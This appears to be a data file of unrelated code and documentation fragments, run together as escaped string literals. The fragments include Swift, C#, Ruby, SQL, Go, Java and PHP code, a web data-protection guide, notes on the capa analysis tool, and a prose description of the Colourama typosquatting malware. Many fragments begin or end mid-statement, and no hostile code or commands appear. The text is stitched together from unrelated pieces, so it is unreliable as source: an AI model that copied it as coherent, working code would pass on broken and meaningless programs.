centerPoint: CGPoint\n let radius: CGFloat\n let leftPoint: CGPoint\n let rightPoint: CGPoint\n let path: CGPath?\n }\n \n private struct EdgeLayerInfo {\n let topPoint: CGPoint\n let topControlPoint: CGPoint\n let bottomPoint: CGPoint\n let bottomControlPoint: CGPoint\n let rightControlPoint: CGPoint\n let path: CGPath?\n }\n \n private struct JointLayerInfo {\n let path: CGPath?\n }\n \n private struct ImageLayerInfo {\n let position: CGPoint\n let opacity: Float\n let transform: CATransform3D\n }\n \n let direction: Direction\n let effectMaxWidth: CGFloat = 170\n let gapProgressValue: Float = 0.7\n \n private let edgeShapeWidthRate: CGFloat = 0.35\n private let effectMaxHeight: CGFloat = 150\n private let circleShapeRadius: CGFloat = 20\n private let jointShapeConstringencyRate: Float = 2\n private let fullAnimationDuration: CFTimeInterval = 0.35\n private let color: UIColor\n private let buttonImage: UIImage?\n\n private weak var container: UIView?\n private let effectCenterY: CGFloat\n private let" +"using System;\nusing System.Text;\nusing System.Windows.Forms;\n\nnamespace IronAHK.Rusty\n{\n partial class Core\n {\n class HotkeyBox : TextBox\n {\n Keys key, mod;\n Limits limit;\n\n [Flags]\n public enum Limits\n {\n None = 0,\n PreventUnmodified = 1,\n PreventShiftOnly = 2,\n PreventControlOnly = 4,\n PreventAltOnly = 8,\n PreventShiftControl = 16,\n PreventShiftAlt = 32,\n PreventShiftControlAlt = 128,\n }\n\n public HotkeyBox()\n {\n key = mod = Keys.None;\n limit = Limits.None;\n Multiline = false;\n ContextMenu = new ContextMenu();\n Text = Enum.GetName(typeof(Keys), key);\n\n KeyPress += delegate(object sender, KeyPressEventArgs e)\n {\n e.Handled = true;\n };\n\n KeyUp += delegate(object sender, KeyEventArgs e)\n {\n if (e.KeyCode == Keys.None && e.Modifiers == Keys.None)\n key = Keys.None;\n };\n\n KeyDown += delegate(object sender, KeyEventArgs e)\n {\n if (e.KeyCode == Keys.Back || e.KeyCode == Keys.Delete)\n key = mod = Keys.None;\n else\n {\n key = e.KeyCode;\n mod = e.Modifiers;\n Validate();\n }\n\n SetText();\n };\n }\n\n public Limits Limit\n {\n get { return limit; }\n set { limit = value; }\n }\n\n void Validate()\n {\n Keys[,] sym = { { Keys.Control, Keys.ControlKey }, { Keys.Shift, Keys.ShiftKey }, { Keys.Alt, Keys.Menu } };\n\n for (int i = 0; i < 3; i++)\n {\n if (key == sym[i, 1] && (mod & sym[i, 0]) == sym[i, 0])\n mod &= ~sym[i," +"# tests for tickets below 1000 and for tests without a ticket reference\n0xxx\n\n# tests for tickets in range [1000, 2000[\n1xxx\n\n# tests for tickets in range [2000, 3000[\n2xxx\n\n# tests for tickets in range [3000, 4000[\n3xxx\n\n# tests for tickets in range [4000, 5000[\n4xxx\n\n# collision of long vehicles\n# collision_long_veh (automatically commented due to no test directory being found)\n\n# ticket672 (automatically commented due to no test directory being found)\n\n# ticket777 (automatically commented due to no test directory being found)\n\n# ticket1047 (automatically commented due to no test directory being found)\n\n5xxx\n6xxx\n7xxx" +"require 'diffy'\n\nmodule Refinery\n module Pages\n # Knows how to build the html for a section. A section is part of the visible html, that has\n # content wrapped in some particular markup. Construct with the relevant options, and then\n # call wrapped_html to get the resultant html.\n #\n # The content rendered will usually be the value of fallback_html, unless an override_html\n # is specified. However, on rendering, you can elect not display sections that have no\n # override_html by passing in false for can_use_fallback.\n #\n # Sections may be hidden, in which case they wont display at all.\n class SectionPresenter\n include ActionView::Helpers::TagHelper\n include ActionView::Helpers::SanitizeHelper\n\n def initialize(initial_hash = {})\n { logger: Rails.logger }.merge(initial_hash).map do |key, value|\n send(\"#{key}=\", value)\n end\n end\n\n attr_reader :id, :fallback_html, :hidden\n alias_method :hidden?, :hidden\n attr_accessor :override_html\n\n def visible?\n !hidden?\n end\n\n def has_content?(can_use_fallback = true)\n visible? && content_html(can_use_fallback).present?\n end\n\n def wrapped_html(can_use_fallback = true)\n return if hidden?\n\n content = content_html(can_use_fallback)\n if content.present?\n wrap_content_in_tag(content)\n end\n end\n\n def hide\n self.hidden = true\n end\n\n def not_present_css_class\n \"no_#{id}\"\n end\n\n protected\n\n def content_html(can_use_fallback)\n override_html.presence || html_from_fallback(can_use_fallback)\n end\n\n def html_from_fallback(can_use_fallback)\n fallback_html.presence if can_use_fallback\n end\n\n private\n\n attr_accessor :logger\n attr_writer :id, :fallback_html, :hidden\n\n def wrap_content_in_tag(content)\n content_tag(:section, content_tag(:div, sanitize_content(content), :class => 'inner'), :id => id)\n end\n\n def" +"\ufeff--random sample from msdn library: http://msdn.microsoft.com/en-us/library/bb630263.aspx\r\nwith paths (\r\n\tpath\r\n\t,EmployeeID\r\n\t)\r\nas (\r\n\t-- This section provides the value for the root of the hierarchy\r\n\tselect hierarchyid::GetRoot() as OrgNode\r\n\t\t,EmployeeID\r\n\tfrom #Children as C\r\n\twhere ManagerID is null\r\n\t\r\n\tunion all\r\n\t\r\n\t-- This section provides values for all nodes except the root\r\n\tselect CAST(p.path.ToString() + CAST(C.Num as varchar(30)) + '/' as hierarchyid)\r\n\t\t,C.EmployeeID\r\n\tfrom #Children as C\r\n\tjoin paths as p on C.ManagerID = P.EmployeeID\r\n\t)\r\ninsert NewOrg (\r\n\tOrgNode\r\n\t,O.EmployeeID\r\n\t,O.LoginID\r\n\t,O.ManagerID\r\n\t)\r\nselect P.path\r\n\t,O.EmployeeID\r\n\t,O.LoginID\r\n\t,O.ManagerID\r\nfrom EmployeeDemo as O\r\njoin Paths as P on O.EmployeeID = P.EmployeeID\r\ngo\r\n\r\n--similar sample, with 2 CTEs in the same query\r\nbegin\r\n\twith FirstCTE\r\n\tas (\r\n\t\tselect 1 as FirstColumn\r\n\t\t)\r\n\t\t,SecondCTE (AnotherColumn)\r\n\tas (\r\n\t\tselect 2\r\n\t\t)\r\n\tselect *\r\n\tfrom FirstCTE\r\n\t\r\n\tunion\r\n\t\r\n\tselect *\r\n\tfrom SecondCTE\r\nend\r\ngo" +"/*\nPackage merkleTree is a generic Merkle Tree implementation, for provably publishing lots\nof data under one succinct tree root.\n\nInstall:\n\n go get github.com/keybase/go-merkle-tree\n\nDesign:\n\nThis package outputs a MerkleTree with two types of nodes: interior index\nnodes, or iNodes, and exterior data nodes, of Leaf nodes. The inodes\nconsist of tables that map prefixes to child pointers. The leafs map a full\nhash to a \"value\".\n\nThis is best demonstrated with a simple example. Let's say you are storing\nthe key-value pair (`0123456789abcdef`, {\"name\" : \"max\"}) in the Merkle tree.\nLet's say that the shape of the tree is to have 256 children per inode.\nThen this key-value pair might be stored under the path\n\n\tat root node: 01 \u2192 aabbccdd\n\tat aabbccdd node: 23 \u2192 eeff5588\n\tat eeff5588 node: 34 \u2192 99331122\n\tat 99331122 node: 0123456789abcdef \u2192 {\"name\" : \"max\" }\n\nMeaning at the root node, we take the first 256-bits of the needed\nkey to get a prefix `01`, and look that up in the node's pointer table\nto get a child pointer, which is `aabbccdd`. This is a hash of an\niNode, which we can fetch from storage, verify it matches the hash,\nand then recursively" +"Data Protection\n===============\n\nNowadays, one of the most important things in security is data protection. You\ndon't want something like:\n\n![All your data are belong to us](files/cB52MA.jpeg)\n\nIn a nutshell, data from your web application needs to be protected,. Therefore,\nin this section we will take a look at the different ways to secure it.\n\nOne of the first things you should take care of is creating and implementing the\nright privileges for each user and restrict them to strictly the functions they\nreally need.\n\nFor example, consider a simple online store with the following user roles:\n\n* _Sales user_: Permission only to view catalog\n* _Marketing user_: Allowed to check statistics\n* _Developer_: Allowed to modify pages and web application options\n\nAlso, in the system configuration (aka webserver), you should define the right\npermissions.\n\nThe main thing is to define the right role for each user - web or system.\n\nRole separation and access controls are further discussed in the [Access\nControl][1] section.\n\n## Remove Sensitive Information\n\nTemporary and cache files containing sensitive information should be removed\nas soon as they're not needed. If you still need some of them, move them to\nprotected areas and/or encrypt them. This" +"# Colourama\n\nColourama used typosquatting to register a package that had similar name to\nColorama, one of is one of the top 20 most downloaded legitimate modules\nin the PyPI registry with 1 million downloads on a daily basis. The colourama\npackage contains a malware which targets Windows machines to implement a\ncryptocurrency clipboard hijacker. As a result, was able to divert any\nBitcoin payment from victim machines to the attacker's bitcoin address.\n\n## Impact\n\nColourama was registered early in December 2017. It is not clear how many times\nthe malicious package have been downlaoded since then. According to a report by\nMedium, it was downloaded 55 times in October 2018.\n\n## Type of compromise\n\nA typosquat attack does not require compromising any type of infrastructure." +"import { useMemo, useRef } from 'react'\nimport { useLayoutEffect } from 'react-layout-effect'\nimport { Lookup } from '@react-spring/types'\nimport {\n is,\n each,\n usePrev,\n useOnce,\n useForceUpdate,\n} from '@react-spring/shared'\n\nimport {\n ControllerFlushFn,\n ControllerUpdate,\n PickAnimated,\n SpringValues,\n} from '../types'\nimport { UseSpringProps } from './useSpring'\nimport { declareUpdate } from '../SpringValue'\nimport {\n Controller,\n getSprings,\n flushUpdateQueue,\n setSprings,\n} from '../Controller'\nimport { hasProps, detachRefs, replaceRef } from '../helpers'\nimport { useSpringContext } from '../SpringContext'\nimport { SpringRef } from '../SpringRef'\n\nexport type UseSpringsProps = unknown &\n ControllerUpdate & {\n ref?: SpringRef\n }\n\n/**\n * When the `deps` argument exists, the `props` function is called whenever\n * the `deps` change on re-render.\n *\n * Without the `deps` argument, the `props` function is only called once.\n */\nexport function useSprings(\n length: number,\n props: (i: number, ctrl: Controller) => Props,\n deps?: readonly any[]\n): PickAnimated extends infer State\n ? [SpringValues[], SpringRef]\n : never\n\n/**\n * Animations are updated on re-render.\n */\nexport function useSprings(\n length: number,\n props: Props[] & UseSpringsProps>[]\n): SpringValues>[]\n\n/**\n * When the `deps` argument exists, you get the `update` and `stop` function.\n */\nexport function useSprings(\n length: number,\n props: Props[]" +"package Selenium::Remote::Finders;\n$Selenium::Remote::Finders::VERSION = '1.36';\nuse strict;\nuse warnings;\n\n# ABSTRACT: Handle construction of generic parameter finders\nuse Try::Tiny;\nuse Carp qw/carp/;\nuse Moo::Role;\nuse namespace::clean;\n\n\nsub _build_find_by {\n my ( $self, $by ) = @_;\n\n return sub {\n my ( $driver, $locator ) = @_;\n my $strategy = $by;\n\n return try {\n return $driver->find_element( $locator, $strategy );\n }\n catch {\n carp $_;\n return 0;\n };\n }\n}\n\n1;\n\n__END__\n\n=pod\n\n=encoding UTF-8\n\n=head1 NAME\n\nSelenium::Remote::Finders - Handle construction of generic parameter finders\n\n=head1 VERSION\n\nversion 1.36\n\n=head1 DESCRIPTION\n\nThis package just takes care of setting up parameter finders - that\nis, the C versions of the find element\nfunctions. You probably don't need to do anything with this package;\ninstead, see L documentation\nfor the specific finder functions.\n\n=head1 SEE ALSO\n\nPlease see those modules/websites for more information related to this module.\n\n=over 4\n\n=item *\n\nL\n\n=back\n\n=head1 BUGS\n\nPlease report any bugs or feature requests on the bugtracker website\nL\n\nWhen submitting a bug or request, please include a test-file or a\npatch to an existing test-file that illustrates the bug or desired\nfeature.\n\n=head1 AUTHORS\n\nCurrent Maintainers:\n\n=over 4\n\n=item *\n\nDaniel Gempesaw \n\n=item *" +"/* ERASE for arrays to free memory\n\n fb_ArrayErase() is called for dynamic arrays and static arrays\n\n if it is known at compile time that the array is static (fixed length)\n then:\n for plain arrays: fbc calls fb_ArrayClear()\n for object arrays: fbc calls fb_ArrayClearObj()\n for FBSTRING arrays: fbc calls fb_ArrayDestructStr()\n\n Otherwise if the array is dynamic or is unknown to be static at \n compile-time, then:\n for plain arrays: fbc calls fb_ArrayErase()\n for object arrays: fbc calls fb_ArrayEraseObj()\n for FBSTRING arrays: fbc calls fb_ArrayStrErase()\n\n fb_ArrayErase() is also called indirectly from rtlib to free the\n memory associated with the array.\n*/\n\n#include \"fb.h\"\n\nFBCALL int fb_ArrayErase( FBARRAY *array )\n{\n\t/* ptr can be NULL, for global dynamic arrays that were never allocated,\n\t but will still be destroyed on program exit */\n\tif( array->ptr ) {\n\n\t\t/* fixed length? then it can't be resized.\n\t\t just clear the elements and leave the descriptor as-is. */\n\t\tif( array->flags & FBARRAY_FLAGS_FIXED_LEN ) {\n\t\t\tfb_ArrayClear( array );\n\n\t\t/* otherwise it's dynamic: free memory */\n\t\t} else {\n\t\t\tfree( array->ptr );\n\t\t\tfb_ArrayResetDesc( array );\n\t\t}\n\t}\n\n\treturn fb_ErrorSetNum( FB_RTERROR_OK );\n}" +"// Copyright (c) 2020 TypeFox GmbH. All rights reserved.\n// Licensed under the GNU Affero General Public License (AGPL).\n// See License-AGPL.txt in the project root for license information.\n\npackage dropwriter\n\nimport (\n\t\"io\"\n\t\"sync\"\n\t\"time\"\n)\n\n// Clock abstracts time for the bucket limiter\ntype Clock func() time.Time\n\n// NewBucket creates a new bucket limiter with a realtime clock\nfunc NewBucket(capacity, refillRatePerSec int64) *Bucket {\n\treturn NewBucketClock(capacity, refillRatePerSec, time.Now)\n}\n\n// NewBucketClock produces a new bucket limiter with a custom clock. Useful for testing.\nfunc NewBucketClock(capacity, refillRatePerSec int64, clock Clock) *Bucket {\n\treturn &Bucket{\n\t\tclock: clock,\n\t\tcapacity: capacity,\n\t\trefillRate: refillRatePerSec,\n\t}\n}\n\n// Bucket implements a token bucket limiter\ntype Bucket struct {\n\tclock Clock\n\n\t// capacity is the total token capacity of this bucket\n\tcapacity int64\n\n\t// refillRate holds how many tokens we refill per second\n\trefillRate int64\n\n\t// mu syncs bucket access\n\tmu sync.Mutex\n\n\t// availableTokens is the total number of tokens currently available\n\tavailableTokens int64\n\n\t// lastTick is the last time we adjusted the available token count\n\tlastTick time.Time\n}\n\nfunc (b *Bucket) adjustTokens() {\n\tb.mu.Lock()\n\tdefer b.mu.Unlock()\n\n\tnow := b.clock()\n\tdefer func() {\n\t\tb.lastTick = now\n\t}()\n\n\tif b.lastTick.IsZero() {\n\t\t// first adjustment/tick ever -" +"/*\n * Copyright 2020, Verizon Media.\n * Licensed under the terms of the Apache 2.0 license.\n * Please see LICENSE file in the project root for terms.\n */\n\npackage com.yahoo.oak;\n\nimport org.junit.Test;\n\n\npublic class MemoryReleaseTest {\n\n @Test(timeout = 300_000)\n public void testByteBuffersReleased() {\n// System.gc();\n// String val = String.format(\"-%016000d\", 0);\n//\n// OakMapBuilder builder = new OakMapBuilder()\n// .setChunkMaxItems(1024)\n// .setChunkBytesPerItem(4096)\n// .setKeySerializer(new StringSerializer())\n// .setValueSerializer(new StringSerializer())\n// .setComparator(new StringComparator())\n// .setMinKey(\"\");\n// OakMap oak = builder.build();\n//\n// int firstIteration = 0;\n// try {\n// while (true) {\n// String key = String.format(\"-%01024d\", firstIteration++);\n// oak.put(key, val);\n// }\n// } catch (OutOfMemoryError e) {\n//\n// }\n//\n// oak.close();\n//\n// int secondIteration = 0;\n// oak = builder.build();\n// System.gc();\n//\n// try {\n// while (true) {\n// String key = String.format(\"-%01024d\", secondIteration++);\n// oak.put(key, val);\n// }\n// } catch (OutOfMemoryError e) {\n//\n// }\n// assert(firstIteration <= secondIteration);\n// oak.close();\n// System.gc();\n }\n\n}" +"'use strict';\n\nangular.module('composeUiApp')\n .factory('logService', function () {\n\n function omitTimestamp(f) {\n\n var colors = [];\n\n return _.map(f, function (item) {\n\n var id = item.container;\n\n if (colors.indexOf(id) < 0) {\n colors.push(id);\n }\n\n return {\n text: item.text.split(' ').splice(1).join(' '),\n container: id,\n color: colors.indexOf(id)\n };\n });\n }\n\n function sortByDate(data) {\n return data.sort(function (a,b) {\n if(a.text < b.text) {\n return -1;\n } else if(a.text > b.text) {\n return 1;\n } else {\n return 0;\n }\n });\n }\n\n function excludeBlankLines(lines) {\n return _.filter(lines, function (line) {\n return line.text.trim().length > 0;\n });\n }\n\n function addContainerInfo(combinedLogs) {\n return _.map(combinedLogs, function (lines, containerId) {\n return _.map(lines, function (line) {\n return {\n text: line,\n container: containerId\n };\n });\n });\n }\n\n var formatLogs = _.flowRight(omitTimestamp,\n sortByDate,\n excludeBlankLines,\n _.flatten,\n addContainerInfo);\n\n return {\n formatLogs: formatLogs\n };\n });" +"class AccessPermission < ActiveRecord::Base\n belongs_to :swarm\n belongs_to :user\n belongs_to :creator, :class_name => 'User', :foreign_key => 'creator_id'\n\n before_save :downcase_email\n\n validates :email, uniqueness: { scope: :swarm,\n message: \"can only be given permission on a swarm once\" }\n validates :user, uniqueness: { scope: :swarm,\n message: \"can only be given permission on a swarm once\" }, if: :user\n\n def self.update_legacy_permissions_for(user)\n aps = AccessPermission.where(email: user.email)\n aps.each do |ap|\n ap.user = user\n ap.save\n end\n end\n\n def self.can_alter?(swarm, user)\n if user\n user.is_admin? || swarm.users.include?(user) || swarm.access_permissions.find_by(email: user.email)\n end\n end\n\n def self.can_destroy?(swarm,user)\n if user\n user.is_admin? || swarm.owners.include?(user)\n end\n end\n\n def self.can_alter_permissions?(swarm,user)\n if user\n user.is_admin? || swarm.owners.include?(user)\n end\n end\n\n def self.can_see_user_drafts?(current_user, user)\n current_user && ((current_user == user) || current_user.is_admin?)\n end\n private\n\n def downcase_email\n self.email = self.email.downcase\n end\n\nend" +"# Packers\nPacked programs have often been obfuscated to hide their logic. Since capa cannot handle obfuscation well, results may be misleading or incomplete. If possible, users should unpack input files before analyzing them with capa.\n\nIf capa detects that a program may be packed using its rules it warns the user.\n\n\n# Installers, run-time programs, etc.\ncapa cannot handle installers, run-time programs like .NET applications, or other packaged applications like AutoIt well. This means that the results may be misleading or incomplete.\n\nIf capa detects an installer, run-time program, etc. it warns the user.\n\n\n# Wrapper functions and matches in child functions\nCurrently capa does not handle wrapper functions or other matches in child functions.\n\nConsider this example call tree where `f1` calls a wrapper function `f2` and the `CreateProcess` API. `f2` writes to a file.\n\n```\nf1\n f2 (WriteFile wrapper)\n CreateFile\n WriteFile\n CreateProcess\n```\n\nHere capa does not match a rule that hits on file creation and execution on function `f1`. \n\nSoftware often contains such nested calls because programmers wrap API calls in helper functions or because specific compilers or languages, such as Go, layer calls.\n\nWhile a feature to capture nested functionality is desirable it introduces various" +"int read(int, unsigned char *, int);\nint write(int, unsigned char *, int);\n\nstatic unsigned isdig[256];\n\nint main()\n{\n\tstatic unsigned char inbuf[4*1048576], outbuf[4*1048576];\n\tregister unsigned char *inp, *outp;\n\tregister unsigned i;\n\n\tfor (i = '0'; i <= '9'; i++) isdig[i] = 1;\n\n\tread(0, inp = inbuf, sizeof(inbuf));\n\toutp = outbuf;\n\n\tfor (;;) {\n\t\twhile (!isdig[*inp]) inp++;\n\t\twhile (isdig[*inp]) inp++;\n\n\t\twhile (!isdig[*inp]) inp++;\n\t\tfor (i = 0; isdig[*inp];)\n\t\t\ti = i * 10 + *inp++ - '0';\n\n\t\twhile (!isdig[*inp]) inp++;\n\t\twhile (*inp == '0') inp++;\n\t\tif (!isdig[*inp]) break;\n\t\twhile (isdig[*inp]) inp++;\n\n\t\tif (i & 1) {\n\t\t\t*(unsigned long *)outp = 0x616B654B; outp += 4;\n\t\t\t*outp++ = '\\n';\n\t\t} else {\n\t\t\t*(unsigned long *)outp = 0x65726147; outp += 4;\n\t\t\t*(unsigned long *)outp = 0x00000A64; outp += 2;\n\t\t}\n\t}\n\n\twrite(1, outbuf, outp - outbuf);\n\treturn 0;\n}" +"import log from \"loglevel\";\nimport prompts from \"prompts\";\n\nimport { clean } from \"./clean\";\nimport { libsize } from \"./libsize\";\nimport { ammendCommit, getLernaVersion, git, replaceTag, run } from \"./utils\";\nimport { variables } from \"./variables\";\n\nexport type ReleaseType =\n | \"major\"\n | \"minor\"\n | \"patch\"\n | \"premajor\"\n | \"preminor\"\n | \"prepatch\"\n | \"prerelease\"\n | \"\";\n\nexport const RELEASE_TYPES: ReadonlyArray = [\n \"major\",\n \"minor\",\n \"patch\",\n \"premajor\",\n \"preminor\",\n \"prepatch\",\n \"prerelease\",\n];\n\nexport function toReleaseType(value: string): ReleaseType {\n if (RELEASE_TYPES.includes(value as ReleaseType)) {\n return value as ReleaseType;\n }\n\n return \"\";\n}\n\nasync function rollback(): Promise {\n log.error(\"Cancelling this release...\");\n const version = await getLernaVersion();\n git(`reset HEAD^`);\n git(`tag -d v${version}`);\n git(\"checkout .\");\n\n return process.exit(1);\n}\n\nasync function verify(): Promise {\n const { complete } = await prompts({\n type: \"confirm\",\n name: \"complete\",\n message: \"Continue the release?\",\n initial: false,\n });\n\n if (!complete) {\n await rollback();\n }\n\n log.info();\n}\n\nexport async function release(\n type: ReleaseType = \"\",\n blog: boolean = !type.startsWith(\"pre\"),\n autoYes: boolean = false\n): Promise {\n const yes = autoYes ? \" --yes\" : \"\";\n\n // first, update the version since I'll be ammending this commit and tag with\n // libsize changes, prettier changelogs, and adding the themes specifically\n // for the tag only" +"#' @section Uniqueness:\n#'\n#' By default the tree IDs are numbered from 1 to n, n being the number of trees found. The problem\n#' with such incremental numbering is that, while it ensures a unique ID is assigned for each tree in\n#' a given point-cloud, it also guarantees duplication of tree IDs in different tiles or chunks when\n#' processing a `LAScatalog`. This is because each file is processed independently of the others and potentially\n#' in parallel on different computers. Thus, the index always restarts at 1 on each file or chunk. Worse,\n#' in a tree segmentation process, a tree that is located exactly between 2 files will have two different\n#' IDs for its two halves.\n#'\n#' This is why we introduced some uniqueness strategies that are all imperfect and that should be seen\n#' as experimental. Please report any troubleshooting. Using a uniqueness-safe strategy ensures that\n#' trees from different files will not share the same IDs. Moreover, it also means that two halves of a tree\n#' on the edge of a processing chunk will be assigned the same ID.\n#'\n#' \\describe{\n#' \\item{incremental}{Number from 0 to n. This method" +"/*\n * The Computer Language Benchmarks Game\n * http://benchmarksgame.alioth.debian.org/\n * \n * modified by Mehmet D. AKIN\n * modified by Daryl Griffith\n */\n\nimport java.io.IOException;\nimport java.io.OutputStream;\nimport java.util.concurrent.ArrayBlockingQueue;\nimport java.util.concurrent.BlockingQueue;\nimport java.util.concurrent.atomic.AtomicInteger;\n\npublic class fasta {\n\n static final int LINE_LENGTH = 60;\n static final int LINE_COUNT = 1024;\n static final NucleotideSelector[] WORKERS \n = new NucleotideSelector[\n Runtime.getRuntime().availableProcessors() > 1 \n ? Runtime.getRuntime().availableProcessors() - 1 \n : 1];\n static final AtomicInteger IN = new AtomicInteger();\n static final AtomicInteger OUT = new AtomicInteger();\n static final int BUFFERS_IN_PLAY = 6;\n static final int IM = 139968;\n static final int IA = 3877;\n static final int IC = 29573;\n static final float ONE_OVER_IM = 1f / IM;\n static int last = 42;\n\n public static void main(String[] args) {\n int n = 1000;\n\n if (args.length > 0) {\n n = Integer.parseInt(args[0]);\n }\n for (int i = 0; i < WORKERS.length; i++) {\n WORKERS[i] = new NucleotideSelector();\n WORKERS[i].setDaemon(true);\n WORKERS[i].start();\n }\n try (OutputStream writer = System.out;) {\n final int bufferSize = LINE_COUNT * LINE_LENGTH;\n\n for (int i = 0; i < BUFFERS_IN_PLAY; i++) {\n lineFillALU(\n new AluBuffer(LINE_LENGTH, bufferSize, i * bufferSize));\n }\n speciesFillALU(writer, n * 2, \">ONE Homo sapiens alu\\n\");\n for (int i = 0; i < BUFFERS_IN_PLAY; i++) {" +"// Copyright 2016-2020, Pulumi Corporation. All rights reserved.\nusing Pulumi;\nusing Pulumi.AzureNextGen.ContainerInstance.Latest;\nusing Pulumi.AzureNextGen.ContainerInstance.Latest.Inputs;\nusing Pulumi.AzureNextGen.Resources.Latest;\n\nclass MyStack : Stack\n{\n public MyStack()\n {\n var config = new Pulumi.Config();\n var location = config.Get(\"location\") ?? \"WestUS\";\n\n var resourceGroup = new ResourceGroup(\"resourceGroup\", new ResourceGroupArgs\n {\n ResourceGroupName = \"aci-rg\",\n Location = location\n });\n \n var imageName = \"mcr.microsoft.com/azuredocs/aci-helloworld\";\n var containerGroup = new ContainerGroup(\"containerGroup\", new ContainerGroupArgs\n {\n ResourceGroupName = resourceGroup.Name,\n Location = resourceGroup.Location,\n ContainerGroupName = \"helloworld\",\n OsType = \"Linux\",\n Containers =\n {\n new ContainerArgs\n {\n Name = \"acilinuxpublicipcontainergroup\",\n Image = imageName,\n Ports = { new ContainerPortArgs { Port = 80} },\n Resources = new ResourceRequirementsArgs\n {\n Requests = new ResourceRequestsArgs\n {\n Cpu = 1.0,\n MemoryInGB = 1.5,\n }\n }\n }\n },\n IpAddress = new IpAddressArgs\n {\n Ports =\n {\n new PortArgs\n {\n Port = 80,\n Protocol = \"Tcp\",\n }\n },\n Type = \"Public\"\n },\n RestartPolicy = \"always\"\n });\n\n this.ContainerIPv4Address = containerGroup.IpAddress.Apply(ip => ip!.Ip);\n }\n\n [Output(\"containerIPv4Address\")]\n public Output ContainerIPv4Address { get; set; }\n}" +"/*\n* Part of WCM Commander\n* https://github.com/corporateshark/WCMCommander\n* wcm@linderdaum.com\n*/\n\n#pragma once\n\n#include \n\nusing namespace wal;\n\n\n/**\n * Edit line controll with history and autocomplete support.\n */\nclass clNCEditLine : public ComboBox\n{\nprivate:\n\tstd::vector m_Prefix;\n\tconst char* m_FieldName;\n\t\npublic:\n\tclNCEditLine( const char* FieldName, int Id, Win* Parent, const unicode_t* Txt, int Cols, int Rows, crect* Rect = 0 );\n\n\tvirtual ~clNCEditLine() {}\n\n\tvirtual bool EventKey( cevent_key* pEvent ) override;\n\n\tvirtual bool Command( int Id, int SubId, Win* Win, void* Data ) override;\n\n\tvirtual int UiGetClassId() override;\n\n\tvirtual bool OnOpenBox() override;\n\t\n\tvirtual void OnItemChanged( int ItemIndex ) override;\n\n\tvoid AddCurrentTextToHistory();\n\t\nprivate:\n\tvoid InitBox();\n};" +"\n\n\n MVC Exceptions\n\n \n Introduction\n\n \n The MVC components in Zend Framework utilize a Front Controller,\n which means that all requests to a given site will go through a\n single entry point. As a result, all exceptions bubble up to the\n Front Controller eventually, allowing the developer to handle them\n in a single location.\n \n\n \n However, exception messages and backtrace information often contain\n sensitive system information, such as SQL statements, file\n locations, and more. To help protect your site, by default\n Zend_Controller_Front catches all exceptions and\n registers them with the response object; in turn, by default, the\n response object does not display exception messages.\n \n \n\n \n Handling Exceptions\n\n \n Several mechanisms are built in to the MVC components already to\n allow you to handle exceptions.\n \n\n \n \n \n By default, the error\n handler plugin is registered and active. This plugin\n was designed to handle:\n \n\n \n Errors due to missing controllers or actions\n Errors occurring within action controllers\n \n\n \n It operates as a postDispatch() plugin, and\n checks to see if a dispatcher, action controller, or\n other exception has occurred. If so, it forwards to an" +"\ufeffusing Microsoft.Xna.Framework;\nusing Microsoft.Xna.Framework.Graphics;\nusing System;\nusing Terraria;\nusing Terraria.GameInput;\nusing Terraria.UI;\n\nnamespace ExampleMod.UI\n{\n\t// This class wraps the vanilla ItemSlot class into a UIElement. The ItemSlot class was made before the UI system was made, so it can't be used normally with UIState. \n\t// By wrapping the vanilla ItemSlot class, we can easily use ItemSlot.\n\t// ItemSlot isn't very modder friendly and operates based on a \"Context\" number that dictates how the slot behaves when left, right, or shift clicked and the background used when drawn. \n\t// If you want more control, you might need to write your own UIElement.\n\t// I've added basic functionality for validating the item attempting to be placed in the slot via the validItem Func. \n\t// See ExamplePersonUI for usage and use the Awesomify chat option of Example Person to see in action.\n\tinternal class VanillaItemSlotWrapper : UIElement\n\t{\n\t\tinternal Item Item;\n\t\tprivate readonly int _context;\n\t\tprivate readonly float _scale;\n\t\tinternal Func ValidItemFunc;\n\n\t\tpublic VanillaItemSlotWrapper(int context = ItemSlot.Context.BankItem, float scale = 1f) {\n\t\t\t_context = context;\n\t\t\t_scale = scale;\n\t\t\tItem = new Item();\n\t\t\tItem.SetDefaults(0);\n\n\t\t\tWidth.Set(Main.inventoryBack9Texture.Width * scale, 0f);\n\t\t\tHeight.Set(Main.inventoryBack9Texture.Height * scale, 0f);\n\t\t}\n\n\t\tprotected override void DrawSelf(SpriteBatch spriteBatch) {\n\t\t\tfloat oldScale =" +"si'2. si'8 si'8 |\nla'1 |\ndo''2 do''4 do''4 |\nsi'2 si'4 r4 |\nsi'4 mi''4 dod''4 re''4 |\nsi'2 si'4 dod''4 |\nre''2 re''4 r4 |\nsi'2. si'8 si'8 |\ndo''1 |\nla'2 la'4 sol'4 |\nfad'2 fad'4 r4 |\nsi'4 si'4 sol'4 sol'4 |\nsol'2 sol'4 fad'4 |\nsol'2 sol'4 r4 |\nsi'4 si'4 do''2 |\nla'2 la'4 si'4 |\nsold'4 sold'4 do''4 do''4 |\nla'4 si'4 sold'2 |\nla'2 do''4 re''4 |\nmi''4 si'4 si'4 do''4 |\nre''4 re''4 re''4. re''8 |\nsol'4 sol'4 sol'4. la'8 |\nsi'4 la'4 sol'2 |\nfad'2 fad'4 sol'4 |\nla'4 la'4 la'4 si'4 |\ndo''2 si'4 la'4 |\nsol'4 sol'4 sol'4 la'4 |\nsi'4 si'4 si'4. re''8 |\nsol'4 la'4 fad'2 |\nsol'1 |" +" 'e13a9d',\n self::KEY_DESCRIPTION_BACKGROUND_COLOR => '9b45e4',\n ],\n [\n self::KEY_NAME_BACKGROUND_COLOR => '222831',\n self::KEY_DESCRIPTION_BACKGROUND_COLOR => '393e46',\n ],\n [\n self::KEY_NAME_BACKGROUND_COLOR => 'da2d2d',\n self::KEY_DESCRIPTION_BACKGROUND_COLOR => '9d0b0b',\n ],\n [\n self::KEY_NAME_BACKGROUND_COLOR => '6f9a8d',\n self::KEY_DESCRIPTION_BACKGROUND_COLOR => '1f6650',\n ],\n [\n self::KEY_NAME_BACKGROUND_COLOR => 'd1274b',\n self::KEY_DESCRIPTION_BACKGROUND_COLOR => '3d0e1e',\n ],\n [\n self::KEY_NAME_BACKGROUND_COLOR => '71a95a',\n self::KEY_DESCRIPTION_BACKGROUND_COLOR => '007944',\n ],\n [\n self::KEY_NAME_BACKGROUND_COLOR => 'e3b04b',\n self::KEY_DESCRIPTION_BACKGROUND_COLOR => '2b2b28',\n ],\n [\n self::KEY_NAME_BACKGROUND_COLOR => 'f6ad7b',\n 